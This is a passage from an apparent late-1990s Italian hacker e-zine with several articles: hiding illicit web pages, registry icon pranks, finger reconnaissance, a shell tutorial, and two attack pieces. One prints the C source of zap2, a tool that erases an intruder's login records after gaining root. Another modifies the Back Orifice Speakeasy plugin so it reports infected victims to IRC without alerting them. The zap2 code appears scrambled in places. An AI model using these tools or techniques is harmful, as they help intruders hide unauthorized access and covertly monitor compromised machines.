"vittima" e copiategli la pagina, che sia bella o brutta non importa, l'importante e' che abbia un contenuto insospettabile, qualche immagine, un po' di testo e qualche link. Ora potete fare l'upload di queste pagine e usarle come fossero le vostre. Ricordatevi di NON creare nessun link dalle vostre pagine fasulle alle vostre pagine vere!!! Ricordatevi anche di modificare eventuali indirizzi Email o dati molto personali presenti nelle pagine fasulle. USATE UN "WEB PAGE FORWARD": A questo punto che avete entrambi i set sul server dovete fare in modo che chi sia interessato al vostro vero sito riesca a raggiungerlo. Per fare cio' avete bisogno di un web page forwarding ossia un servizio gratuito che molti siti forniscono che consiste in un breve URL che rinvia l'utente ad una determinata pagina. Una volta trovato un forwarder di vostro gradimento, v'iscriverete per fare in modo che l'utente digitando questo nuovo URL sia inviato nelle vostre pagine "improprie" su GeoCities o Tripod. L'URL cosi' ottenuto sara' quello da distribuire agli "amici". Se non volete un account presso i Web page forwarding, potete farvi la vostra pagina di forward da soli. Procuratevi una nuova pagina su GeoCities o su Tripod o dove diavolo volete e settatela in modo che vi rinvii alle vostre vere pagine, di seguito trovate il codice HTML per far cio': <head> <meta http-equiv="refresh" content="0; URL=http://mia.pagina"> </head> Clicca qui per andare alle mie pagine: http://mia.pagina/. Dato che i browser piu' datati potrebbero non riconoscere il comando refresh assicuratevi di aggiungere un link alle vostre vere pagine. Io personalmente vi sconsiglio di crearvi il forward da soli ma di procurarvelo dato che in quest'ultimo modo si hanno dei vantaggi notevoli: 1. Il vostro indirizzo di forward non cambiera' mai. Infatti anche se le vostre pagine fossero cancellate o trasferite, il vostro indirizzo di forward rimarrebbe lo stesso e sarebbe molto semplice "adattarlo" al nuovo collocamento delle vostre pagine. 2. L'indirizzo di forward e' solitamente piu' corto del vostro URL reale. Esempio: http://www.geocities.com/SiliconValley/Foothills/5966/index.htm (URL Reale) http://come.to/MiaPagina (URL di Forward) CONSIGLI EXTRA PER LE DIRECTORY: · Posizionate i vostri file "illegali" all'interno di directory con nomi innocenti. Esempio: "storie", "grafica", "poesie", "antivirus", "amici", ecc. Siate creativi!!! · Per meglio proteggere i file all'interno delle vostre directory, fate l'upload di una pagina bianca o contenente la simpatica scritta: "404 File Not Found" e usatela come Indice. LISTA DELLA SPESA: Email gratuite: · · · · · http://www.hotmail.com/ http://www.mailexcite.com/ http://www.netaddress.com/ http://www.yahoo.com/ http://www.freemail.it/ Email Forward gratuito: · http://www.bigfoot.com/ · http://www.netforward.com/ Web Page Forward gratuito: · http://come.to/ · http://rsl.net/ Spazio Web gratuito: · · · · · · http://www.angelfire.com/ http://www.fortunecity.com/ http://www.geocities.com/ http://www.tripod.com/ http://www.wbs.net/ http://www.xoom.com/ CONCLUSIONI: Spero che questa guida vi abbia ispirato e vi abbia fornito delle buone idee da mettere in pratica. Tuttavia non vi posso promettere che le vostre pagine rimarranno per sempre ma probabilmente dureranno piu' di quanto sarebbe normalmente grazie a questi miei consigli. Grazie per l'attenzione e divertitevi a mantenere le vostre pagine "illegali"!!! Biavo Per informazioni, complimenti, offese, scambio di foto porno :) [email protected] PS: un ringraziamento particolare a Moh, il piu' grande programmatore che conosca (nonche' mio spacciatore personale) che mi ha aiutato a creare questo articolo. PSS: un salutone a ZeroCool (che ogni giorno mi stupisce con qualche interessante programmino) e a Dark Schneider (che crede nella mia stessa religione, NESSUNA), i piu' interessanti tipi che abbia conosciuto sulla rete. PSSS: un grazie particolare a Tarsa, l'unica ragazza che conosca che oltre ad essere bella e' anche intelligente. ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ COME CAMBIARE ICONE CON REGEDIT ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Qui vi spiego un piccolo skerzetto che potete fare a vostri amici o magari potete usare per personalizzare il vostro desktop.Se poi usate la stessa tattica per lasciare traccia del vostro passaggio in un pc ,io non vi ho detto nulla.... Allora , per prima cosa dovete creare dei files con estensione .ico , mi pare quasi ovvio :-]. Per fare cio' usate Microangelo o similari , magari modificando le icone che gia' sono installate nel vostro sistema. Compiuto questo passo necessario dovete sapere una piccola cosa sulle icone: sono contenute in files .exe ,.dll e .ico. Per i files .exe e .dll c'e' da dire che le icone memorizzate sono numerate a seconda dell'immagine , quindi se un .exe ha 50 icone , come si fa a sapere quale delle 50 cambiare? Per non farla troppo lunga , io consiglio di usare Icon Ripper 1.0.0.3 , scaricabile all'url http:www.worldcity.nl/~marcoko che e' in grado di esaminare sia exe che dll e di salvare le icone nel formato standard. Tenete ben presente che il numero di indice delle icone parte da Icon Ripper segna la prima icona con il numero 1.State attenti , altrimenti sostituite l'icona sbagliata... Uso anke Collect Icon 1.0 reperibile a http://www.hkstar.com/~myst che mi da la possibilita' sia di fare una scansione del disco in cerca di icone , sia di salvarle in bitmap. Insomma, i motori di ricerca li sapete usare , io ho solo dato un piccolo suggerimento , in modo da sapere quali files modificare :-] Espresse le vostre capacita' artistiche potete adesso passare alla fase piu' concettuale della vostra opera. Create un files con estensione reg e scrivete le modifiche che desiderate introdurre nel look delle vostre icone , in questo modo: ---------inizio files .reg-----------REGEDIT4 ;RigoR MorteM ;Tabulato spiccio per la modifica delle icone ;[email protected] ;Club SpiPPoLaTorI 98-99 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Shell Icons] "8"="C:\\directory delle icone\\nomeicona.ico" "0"="C:\\directory delle icone\\nomeicona.ico" @="C:\\directory delle icone\\nomeicona.ico" [HKEY_CLASSES_ROOT\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\DefaultIcon] @="C:\\directory delle icone\\nomedll.dll,0" [HKEY_CLASSES_ROOT\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\DefaultIcon] @="C:\\directory delle icone\\nomeicona.ico,0" [HKEY_CLASSES_ROOT\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48}\DefaultIcon] @="C:\\directory delle icone\\nomeicona.ico,0" ---------fine files .reg-----------Spiegazioncina rapida ..... Il path fra parentesi quadre specifica su che porzione del registro andate a lavorare , il numero fra virgolette specifica il numero dell'icona da sostituire (in questo caso il numero 8 e' l'icona dell'hard disk) ed il path dopo il segno di uguale e' riferito alla directory nella quale sono inserite le icone e l'icona da usare in sostituzione. Potete anche usare un files .dll dal quale estrarre le icone ma in questo caso dovrete specificare anche il numero dell'icona da estrarre , cn il solito metodo del numero... Da notare che l'icona numero 0 puo' essere definita sia con "0" sia con @ (senza virgolette @ , mi raccomando).Se poi volete specificare tutti e 2 non fa male... Se poi l'icona e' l'unica contenuta nel files che volete modificare dovete specificare sia @ che lo zero alla fine del nome dell'icona sostitutiva. Qui sotto vi riporto parte dei files che contengono icone : iosclass.dll inetcpl.cpl expolorer.exe shell32.dll infrared.dll mmci.dll modem.cpl setupx.dll msprint.dll : : : : : : : : : icona del lettore cd e di un hard disk icone relative ad Internet Explorer 4.0 risorse del computer la maggior parte delle icone di windows icona delle porte a raggi infrarossi icona multimedia icona del modem , come dal nome :-]]]] tamburi , stampante , scheda scsi hard disk di rete... stampante di rete non connessa Bene , mi pare di aver detto tutto , per adesso vi saluto !Ah, se volete delle icone di teschi o simili , contattatemi , magari si fa a cambio , ok? Per chiarimenti la mia mail e' [email protected] ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ USARE ZAP2 X RENDERSI INVISIBILE ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ USARE Zap2 PER RENDERTI INVISIBILE "Il mio nome e' Nessuno." Bene guys, avete ottenuto il vostro primo (ma potrebbe pure essere il 200esimo..) accesso root su un bel sistema; ora siete felici ok, ma cosa sono quelle facce? Cosa dite? Non avete nessuna voglia di farvi beccare dal SysAdmin che vigile e attento come una fai'n che ha trasformato il suo stupendo sistema in un campo minato da logz? Mi sembra piu' che giusto ragazzi. Vediamo allora un programmino che, lanciato da root, cancellera' le vostre tracce evidenti come una merda di vacca sul divano bianco della nonna, dai filez: wtmp, utmp e lastlog. Innanzi tutto voi avrete gia' precedentemente controllato l' esatta ubicazione di questi filez nel sistema, perche' questo vi servira' per editare l'inizio del programma inserendo il loro percorso giusto. Solitamente si trovano in: /var/adm/wtmp /var/adm/utmp /var/adm/lastlog E le righe del sorgente da editare sono: #define WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/var/amd/lastlog" Prima di fare girare il programma digitate W per vedere se c'e' qualcuno, poi per eseguirlo digitate ./zap2 username (che chiaramente va sostituito con il vostro username). Scrivo ora il sorgente zap2.c -----------------------------------TAGLIA------------------------------------here #include <sys/types.h> #include <stdio.h> #include <unistd.h> #include <sys/file.h> #include <fcntl.h> #include <utmp.h> #include <pwd.h> #include <lastlog.h> #define WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/usr/adm/lastlog" int f; void kill_utmp(who) char *who; { struct utmp utmp_ent; } if ((f=open(UTMP_NAME,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } void kill_wtmp(who) char *who; { struct utmp utmp_ent; long pos; pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0) { } } while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))<0) { pos = -1L; } else { if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof(struct utmp )); lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND); write (f, &utmp_ent, sizeof (utmp_ent)); pos = -1L; } else pos += 1L; } } close(f); void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } } else printf("%s: ?\n",who); main(argc,argv) int argc; char *argv[]; { if (argc==2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]); printf("Zap2!\n"); } else printf("Error.\n"); -----------------------------------TAGLIA------------------------------------Bene, ora provate nuovamente a digitare w e magia! Voi non siete piu' su quel sistema a quanto pare. ;-) Ma ricordate: questo programma funzia solo per i suddetti logz; se dovete infatti usare ftp dovrete poi preoccuparvi di editare wtmp e cancellare i vostri logz ftp oppure usare un altro programma apposito. Anche i maillogs sono "fuori giurisdizione" dello zap2. Percio' guys mi raccomando: prudenza e pulizia soprattutto; sappiate sempre che se il sistema e' un minimo sicuro e il SysAdmin non e' completamente idiota, potrebbero laggarvi addirittura i tarzanelli del culo. ;-) ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ]Da RaG3[ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ FINGER ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ -----------------< fritz presents.... >----------------:finger Ok..rieccomi con un altro articoletto per voi cicciolini miei ;-) Questo e' nato perche' sono stato incaricato assieme ad altri di scrivere qualcosa in generale su come nascondere la propria identita' durante le piu' svariate peregrinazioni su internet, che siano una passeggiata sul web, una chat tra amici o una hackerata (o lamerata...;-) ) Allora, come primo argomento che propongo io vi offro come trovare info col finger... Ok, direte, che cazzo c'entra con l'anonimato?? No..dai..non ditelo...non lo so bene neanch'io cosa c'entri, solo che mi e' venuto in mente, lo spoofing era un topic gia' assegnato (per fortuna :-)) e di shell parlero' dopo. Ok allora posso iniziare. Innanzitutto e' da dire cos'e' il finger, cosa mi rappresenta... be'... e' un servizio disponibile su piattaforme *NIX nato con lo scopo di fornire informazioni su un utente se ha un account presso quel server. Ci sono tuttavia in corso discussioni sul fatto che possa essere legale o meno ottenere info in questo modo. Io credo proprio di si, ma e' un IMO (senza honest :-) ). Infatti visitare un server presso la porta 79 e' legale come visitarlo presso la 80, solo che in quest'ultima si trova la pagina web, nella 79 il servizio finger. Allora io dico: se con una semplice domanda ad un servizio pubblico il server mi risponde con nome, cognome ed email di tutti i suoi utenti, be', sono cazzi dell'amministratore che lascia di pubblico dominio informazioni che potrebbero essere considerate come riservate, non miei che le leggo che strumenti reperibili presso qualsiasi sito di programmi shereware piu' che legali. In ogni caso, come gia' detto, e' un IMO. Allora, come si usa? Per utenti *NIX e' facile, c'e' il comando fornito di serie, ma per Windows?? (escluso NT che dovrebbe averlo) e per Mac e OS-2 bisogna trovarsi l'apposito programmino. Ce ne sono tanti in giro, sia applicazioni che fanno solo finger, sia applicazioni che offrono un'insieme di funzioni come ping, host domain search ecc ecc... Se ne siete sprovvisti, lasciatemi consigliare l'ottimo ws_ping pro pack 2.x, consigliato dai livelli alti dell'hacking :-), l'URL l'ho persa, ma se cercate con l'FTPSearch il file wsp_eval.exe lo trovate subito, oppure Finger32, consigliato dallo staff di TheArgon, reperibile presso ftp://hyper.net.au/Win95nt-apps/Finger/Wsfinger/wsfngr32.zip . Ecco, ora che vi siete muniti, nel caso improbabile che ne foste sprovvisti, spiego meglio come si usa. Allora, come gia' accennato, si possono ricavare info su un utente connesso al server, vediamo assieme qualche esempio... [premessa: sfortunatamente di server che offrono ancora il servizio di finger ce ne sono pochi, gli amministratori tengono sempre piu' alla privacy dei loro abbonati...-e sarebbe anche ora :-) ] Allora... troviamo un dominio su cui fare un paio di prove... quello che ho trovato io (grazie Buttha!! :-) ) lo chiamero' host.it, eheheh..W la fantasia.. Per prima cosa un finger generico, ovvero -finger @host.it, che dovrebbe ritornarmi la lista di tutti gli utenti connessi, come infatti accade: ---<>--Welcome to Host's finger demon Searching for: '' [codice1] [username1] <email1> [codice2] [username2] <email2> [codice3] [username3] <email3> [... seguono altre 17 righe di questo tipo, che dopo lunghe riflessioni ho deciso di censurare, lasciare cioe' [codice] ecc invece del codice, della username e della email che ho ottenuto col finger] Only first 20 users listed, please be more selective ---<>--eheheh... il demone del finger ci avvisa che la nostra richiesta e' stata troppo generica, e quindi ci fa vedere solo i primi 20. A questo punto, vogliamo sapere chi e' l'amministratore? Ok allora si fa un -finger [email protected] che mi fornisce un output sempre dello stesso tipo: ---<>--Welcome to Host's finger demon Searching for: 'root' [codice] [nome cognome] ---<>--- <email> :-))) E via di seguito. Ma tutto cio', direte voi, cosa ci interessa? ehmm... questo lo ignoro anch'io, solo che ormai l'ho scritto :) Cmq ricordatevi di una cosa: non so se avete mai visto una lista di account su un server *NIX, non sono presenti solo persone fisiche, come invece ci si aspetterebbe, con settati i loro privilegi, ma anche una lista di programmi che per lavorare correttamente necessitano anch'essi di vari privilegi. Quindi se siamo mooolto fortunati possiamo anche eseguire finger non solo sugli utenti ma anche su questi programmi, che vengono definiti demoni. Provate infatti a fare qualche tentativo del tipo finger [email protected] finger [email protected] finger [email protected] ecc ecc (e qui entra in gioco l'exploit, ma questo e' un altro discorso hehehe). Ok, anche questo a' finito. Un grazie a N0bodY88 sia per avermi dato la possibilita' di scrivere su questa e-zine che promette molto bene, sia per aver scelto un nick che ogni volta ci metto almeno 5 secondi per scrivere correttamente eheheheh... ciao ciao fritz ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ######################################################### # # # Come modificare speakeasy per non essere beccati # # # # 15-2-99 by Meew <[email protected]> # # # ######################################################### ///////////////////////////////////////////////////////// // Classico Disclaimer con qualcosa in piu'(leggere pliz) ///////////////////////////////////////////////////////// ok, questo serve solo per scopi umanitari, non mi assumo nessuna responsabilita' per qualsiasi conseguenza derivante dalla lettura di questo documento ecc. ecc. inoltre vorrei segnalare a tutti i lettori (grandi & piccini ) che io NON SO programmare in C e che NON GARANTISCO assolutamente che la dll funzioni... l'ho provata piu' volte e non mi ha mai dato problemi, ma non si sa mai, dato che in pratica ho sbattuto uno sleep dentro la funzione di inizio... /////////////////////// //Intro e boiate varie /////////////////////// ok, bo e' una gran cosa, ma se installato su qualcuno con IP dinamico perde un po' significato... come facciamo a ribeccare la vittima?? Il signor Brian Enigma [email protected] ci ha pensato e ha deciso di scrivere una dll che notificasse la presenza della vittima sul canale #bo_owned di un server irc scelto da noi. In questo modo pero' la dll (che si esegue automaticamente grazie al boconfig) cerca di connettersi a internet a ogni avvio del computer, e continuando ogni pochi minuti a provarci, facendo apparire continuamente la finestra di connessione... e facendo quindi insospettire la vittima. Allora ecco che arriva la parte bella... e se facessimo aspettare la dll finche' la connessione non si avvia e solo allora le facessimo mandare la notifica? Ecco come fare ////////////// //Ingredienti: ////////////// - un computer con schermo e tastiera - il codice sorgente di Speakeasy (reperibile a http://www.netninja.com) - un compilatore c (io ho usato il Visual c++) Tempo di preparazione: 10 min. Tempo di cottura: a seconda del forno //////////////////////// //Preparazione & Cottura //////////////////////// Allora, innanzi tutto aprite il file speakeasy.c , a un certo punto ci sono una serie di #include... aggiungete le righe #include <winreg.h> #include <TCHAR.H> appena sotto c'e' la definizione delle funzioni... sotto "void myIP(char *result);" aggiungete int ActiveConnection(); //questo e' il piatto forte!! Poi ci sono le variabili... aggiungente int connesso=0; li sotto c'e' una serie di #define... se non vi va il nome del canale cambiatelo e cambiatelo anche in tutte le altre occorrenze del progetto... poi c'e' "const char customMessage[][80]={"DEAD COW!", ecc. , volendo potete cambiare i messaggi di saluto, ma non usate piu' di 80 caratteri. ok... molto piu' giu, praticamente alla fine, trovate __declspec ( dllexport ) char * WINAPI start(int *active, char *args) { char *p; int count; ok, qui sotto (prima di globalActive = active;) aggiungente le righe seguenti while (ActiveConnection()==0) { Sleep(1000*60*2); } ok, a questo punto in fondo a tutto aggiungete questo //---------begin cut-----------// int ActiveConnection() { TCHAR tszKey[] = _T("System\\CurrentControlSet\\Services\\RemoteAccess"); HKEY hKey; DWORD dwDim; BYTE *pb; PULONG pippo=0; long res ; RegOpenKeyEx( HKEY_LOCAL_MACHINE, tszKey, 0, KEY_ALL_ACCESS, &hKey ); RegQueryValueEx( hKey, _T("Remote Connection"), NULL, pippo, NULL, &dwDim ); pb = (BYTE *)malloc(dwDim); res=(RegQueryValueEx ( hKey, _T("Remote Connection"), NULL, pippo, pb, &dwDim ) ); RegCloseKey( hKey ); if (res ==0) { if(*pb==0) { } else { } } else { return 0 ; return 1; return 0; } } //---------end cut-----------// Ok, a questo punto dovete linkare tutto a Wsock32.lib. (se usate VC++ 5 fate cosi': andate nel menu project e scegliete settings, poi scegliete la tab link e aggiungete nella textbox intitolata "object / library modules" Wsock32.lib) Compilate e avete finito! Ora potrete usare la vostra dll come se fosse speakeasy, quindi con gli stessi parametri ecc. (per tutto questo vi rimando al txt che trovate nel pacchetto scaricabile da http://www.netninja.com) ma la dll aspettera' il momento giusto prima di lanciarsi! //////////////// // Saluti & baci //////////////// Ne approfitto per salutare la mia mamma e il mio babbo, piu' tutti quelli in ascolto che mi conoscono, Raf che mi ha aiutato parecchio e il NG ahccc quando era ancora quello di una volta. Meew ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ COS'E' E COME SI USA UNA SHELL ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ -----------------< fritz presents.... >----------------:shell Ok... questo argomento lo vedo piu' pertinente al topic che mi era stato assegnato rispetto a "finger", ma che volete farci?... sono OT per natura io ;-) Quello che voglio fare con questo breve testo e' spiegare' cos'e' una shell, come procurarsela, come stabilire se e' quella che fa per noi, e un breve tutorial di livello moooooolto basso. Piccola premessina: questo articolo e' per newbies al 100%, dubito che possa servire a chi gia' usa un qualsiasi sistema tipo UNIX, quindi se siete gia' navigati nell'argomento, molto probabilmente questo articolo non vi servira' a nulla. Infatti io stesso mi sono avvicinato al mondo dell'hacking da solo 2 mesi, e questo e' quanto ho scoperto finora. --| parte 1ø: cos'e' una shell |-- be'... avete presente un qualsiasi terminale *NIX? Ecco, la shell e' quell'interfaccia, quella che al posto del solito prompt di MSDOS o Windows tipo C:\>_ ci mostra un prompt del tipo % oppure $ oppure # Non avete presente questo tipo di interfaccia? Uhmm..allora come spiegare? Be'... posso dire che con una shell (letteralmente = guscio) e' come se stesse usando un terminale UNIX, e potete eseguire molti dei comandi tipici di questo sistema. Avere una shell e' fondamentale per un hacker non dico che si rispetti, ma solo che voglia essere considerato tale e non solo un lamah :-) Mettiamo il caso infatti che vogliate giocare al piccolo hacker con un server che avete scoperto, per esempio che usa Apache sotto UNIX e ha le famigerate estensioni front-page, e non e' per nulla raro trovare server cosi'. Allora ricorrete al vostro archivio di exploit preferito, che sia bugtraq, rootshell o exploit world non importa, e trovate le indicazioni per sfruttare questo pesante bug che potrebbe darvi i privilegi di ROOT, ovvero libero accesso a tutti i file con permesso di lettura e scrittura (ooohhhh... stupore heheheh) Cosa leggete? Che bisogna non solo usare una shell UNIX, ma anche quale shell usare, cioe' la Bourne ("if you use the bastard C-shell it obviously won't work as written"), figuriamoci se va bene il prompt di MS-DOS :-)))) Questo perche' bisogna usare dei comandi e scrivere degli script che gli OS di casa Microsoft non riescono a fare. E allora cosa facciamo noi bimbi col w95-98? Passiamo al linux (scelta consigliata eheh) oppure troviamo una shell in giro per internet. --| parte 2ø: come procurarsela |-- ehmmm... qua arriva il bello! In poche parole: e' un casino! :-) Nel senso che si trovano tranquillamente un po' di shell in giro, questa per esempio e' la lista pubblicata dallo staff di TheArgon: ----------http://www.freeshells.net http://www.cyberspace.org http://www.continuum.eu.org http://dishboy.dyn.ml.org http://www.nyx.net http://vester.dyn.ml.org http://www.vexation.org http://www.arbornet.org/projects.html http://www.unixnet.org http://www.nether.net http://www.lanck.ru http://sdf.lonestar.org http://suburbia.com.au http://www.nyx.net http://www.shellyeah.com ----------conviene che prima vi facciate un giro per il server web di questi siti, in modo tale da leggere cosa potete fare sulla shell e come accedervi. Ma se siete impazienti, provate subito Nyx.net:23 cyberspace.org:23 come sarebbe a dire in che modo? Aprendo un qualsiasi telnet, anche c:\windows\telnet.exe va benissimo, e digitate nyx.net su Host name, mentre come port e Term type lasciate le impostazioni di default (telnet e vt100). Queste shell pero' non aspettatevi che siano il massimo della vita :-) non credo che tutte lascino girare processi e/o compilare sorgenti o telnettarsi all'esterno del sito. Queste vanno solo bene per iniziare a capire come funziona la storia. Quando sarete un po' piu' smaliziati, potrete cercare la shell definitiva, magari potrete crearla voi, hackerando un sito e creando un account per i vostri giochetti ;) . --| parte 3ø: comandi basilari della shell |-- Be'... sono logicamente comandi UNIX, quindi: -cd <nome dir> per muoversi nel file system -ls come il comando "dir" per dos -cp <file1> <file2> come il comando "copy" per dos -rm <nome file> come il comando "del" per dos -mv <file1> <file2> come il comando "move" per dos -mkdir <nome dir> come il comando "md" per dos -rmdir <nome dir> come il comando "rd" per dos -man <comando> fornisce info su quel comando -more <file> visualizza il file Questi sono solo i comandi basilari per muoversi. Per avere un ottimo manuale (naturalmente gratis) fate un salto su http://www.pippo.com e cercate "the linux user guide", sono circa 170 pagine molto ben fatte, il classico manuale! Vivamente consigliato dal fritz per chi vuole un po' imparare ad usare le shells :-) --| parte 4ø: come stabilire la bonta' della shell |-- Ovvero come stabilire se quella che avete trovato fa per voi, soddisfa le vostre esigenze o se invece rappresenta solo un punto di partenza, ma che poi dovrete abbandonare se vorrete entrare nel vero mondo degli exploit. Ecco qui "ten Meinel Hall of Fame LAN and Internet Exploration Tools" by Carolyn P. Meinel, ovvero 10 comandi "that you absolutely must have access to": ---------------1) telnet <host name> <port number> fondamentale, se non puoi telnettarti con nessun sistema, "you are totally crippled as a hacker" e quindi cercati all'istante un'altra shell 2) who mostra quali altri utenti sono connessi 3) netstat mostra statistiche come per esempio la lista delle connessioni del server ad internet 4) whois <hostname> per avere informazioni su un sito internet 5) nslookup altre info, cosi' come il prossimo comando 6) dig 7) finger vedi l'altro articolo per l'e-zine :-) 8) ping per vedere se un sito e' attivo e come e' la connessione a quell'host (lenta, veloce... ecc) 9) traceroute traccia il percorso dei vari pacchetti spediti ad un certo host 10) ftp per eseguire download e upload di files su altri computer. ---------------Ora sta a voi giudicare la shell che avete appena trovato, se e' utile oppure da scartare. --| parte 5ø: breve tutorial di bassissimo livello |-- Ok, allora vediamo un po' come funziona la piu' famose delle varie shell che sono in giro, ovvero la shell Grex, che trovate all'indirizzo Cyberspace.org:23 Allora, per prima cosa vi trovate di fronte al saluto della macchina, e alla richiesta di login. Dato che non vi siete mai collegati (o se l'avete fatto, rifatelo, cosi' almeno leggete anche questa parte dell'articolo eheheheh..) vi viene chiesto di digitare come Login: newuser (o qualcosa del genere...) Ok, adesso siete dentro... vi beccate 'na marea di testo, che cmq vi consiglio di leggere. Tra le altre cose vi dice cosa potete fare e cosa non potete fare con Grex: ovvero, non potete usare telnet, ftp etc (come specificato in "You will not be able to use most Internet services (telnet, FTP, etc.)", ma potete scrivere e ricevere posta, credo (almeno quello! hehehe). Dopo la pappardella, vi viene chiesto di settare le vostre preferenze: per prima cosa vi chiede di settare quale combinazione di tasti volete usare per identificare i tasti "erase", "kill", "interrupt". Allora da bravi premete alla prima richiesta il tasto BACKSPACE o CTRL+H, alla seconda CTRL+C e alla terza CTRL+N. A cosa servono questi tasti? Ok, erase cancella il primo carattere a sinistra del cursore, kill cancella tutta la riga, interrupt serve per interrompere un'operazione e tornare quindi al prompt. La prossima domandina e' che tipo di terminale usi. E qui e' d'uopo rispondere VT100, il classico terminale UNIX solo testo, sempre compatibile, che rappresenta il jolly. Dopodiche' seguiranno domande tipo: full name: address: telephone number: occupation: computer equipment: born: sex: interest: comments: Naturale che non siete obbligati a scrivere i vostri dati giusti giusti. Infine chiede se volete rendere pubblici i vostri dati oppure no. Segue la scelta della shell, nel senso dell'interprete dei comandi, la cosa piu' importante, perche' se scegliete una shell di cui non sapete i comandi... be''...dovrete cambiarla. Fate voi. Grex consiglia per i principianti la "bbs", ma io mi trovo con la "bash", anche perche' a tempo perso uso Linux :) Infine dovrete selezionare quale editor di testi vorrete usare. Consiglio vivamente 